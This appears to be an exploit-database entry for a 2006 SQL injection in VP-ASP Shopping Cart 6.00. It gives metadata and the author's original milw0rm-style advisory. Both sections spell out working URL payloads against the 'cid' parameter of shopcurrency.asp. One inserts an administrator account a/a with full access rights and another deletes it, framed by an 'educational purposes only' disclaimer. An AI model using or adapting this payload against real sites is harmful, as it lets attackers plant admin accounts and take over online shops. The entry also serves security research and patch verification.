header-logo
Suggest Exploit
vendor:
VP-ASP Shopping Cart
by:
tracewar
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: VP-ASP Shopping Cart
Affected Version From: 6.00
Affected Version To: 6.00
Patch Exists: YES
Related CWE: N/A
CPE: a:vp-asp:vp-asp_shopping_cart:6.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

VP-ASP 6.00 SQL Injection / Exploit

The SQL Injection bug is in the shopcurrency.asp file under the 'cid' query. A quick hack to add user a/a is '/shopcurrency.asp?cid=AUD';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--. To remove the user 'a', the command is '/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--.

Mitigation:

The vendor was already notified.
Source

Exploit-DB raw data:

VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)

people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.

* the vendor was already notified.

p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.

* this information is for educational purposes only!

----

The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.

quick hack to add user a/a:

/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

and for those of you that don't know sql at all
this is how you remove the user 'a':

/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--

-tracewar

# milw0rm.com [2006-05-06]